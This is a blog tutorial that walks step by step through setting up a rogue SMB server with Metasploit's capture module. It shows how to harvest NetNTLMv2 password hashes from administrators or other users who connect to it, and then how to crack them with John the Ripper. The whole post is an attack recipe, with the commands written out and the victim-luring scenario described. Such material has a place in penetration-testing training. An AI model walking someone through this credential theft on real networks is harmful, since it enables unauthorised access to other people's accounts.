How to Setup a Rogue (Fake) SMB Server to capture credentials

by hash3liZer . 21 December 2018

How to Setup a Rogue (Fake) SMB Server to capture credentials

SMB which is an abbreviation of Server Message Block is a protocol to share files, printers and other stuff among computers. Throughout the history of SMB, various loopholes including RCE are identified in the previous versions. It is based on server (request-response) structure and is widely implemented in local networks or small offices etc.

Metasploit provides an auxillary module for hosting a fake SMB server which captures the credentials of a user when the request is sent to server. This makes exploiting Samba more easy depending on whether you have the capacity to wait for your target to indulge in the malicious action.

Think of a case where you are on a local network and the administrator tries to access your computer through samba and use it's credentials. The password hash can be acquired by setting up a fake SMB server. Just as Social media phishing and Rogue Acesss Point.

STEP 1

Metasploit

Metasploit uses postgresql database for the storage service and is heavily dependant on it. By default most of the systems keep postgresql shut. So, start the postgresql service:

$ systemctl start postgresql
$ systemctl enable postgresql

The second command enables the postgresql service to start at the boot time. Hence, there's no need to do this step again. Now, start metasploit console:

$ msfconsole

STEP 2

Options

To setup the server, we need to use the required auxillary module. Metasploit provides a lot of modules and you can accordingly search for one with search command. However, let's just stick to the task now. Set the SMB fake service module:

use auxiliary/server/capture/smb

There are some other fake services available also, located under the directory: auxiliary/server/capture/

Let's look at the available options:

$ show options

From the options, we have JOHNPWFILE and CAINPWFILE. The server would output the credentials in a hash form which must be cracked later. Where JOHNPWFILE indicates a hashed file for John the Ripper and CAINPWFILE indicates a hashed file for Cain and Abel. Since, i am using Linux, i'll go with John file. You can choose accordingly.

$ set JOHNPWFILE /home/hash3lizer/Desktop/smbhash

STEP 3

Exploit

I'll let remain the other options same as they are. And finally, run the fake service:

$ run

Now, let's come towards the victim side. Let's suppose an administrator who thinks that he can authenticate with the server would go with the alotted credetials but infact it's fake server. Share your ip on the network and as you will get a connection from another user, the module will show captured hash and password will be stored as hashed in the file.

As being another user, i would run the command:

$ smbclient -L [IP here]

STEP 4

Crack the Password

Now, if you come back to the metasploit terminal, it would say hash captured!

Let's pass it to the john the ripper. Depending on the complexity of the password john the ripper will try to crack the password. This would take days to months depending on its complexity and randomness.

$ john /home/hash3lizer/Desktop/smbhash_netntlmv2

Conclusion

We can capture SMB credentials by hosting a Rogue SMB server on localhost and metasploit makes that easy for us. The captured hash can later be cracked using john the ripper or Cain & Abel. This provides us a quick manifestation of how easy is it to acquire credentials by making the users perform malicious tasks.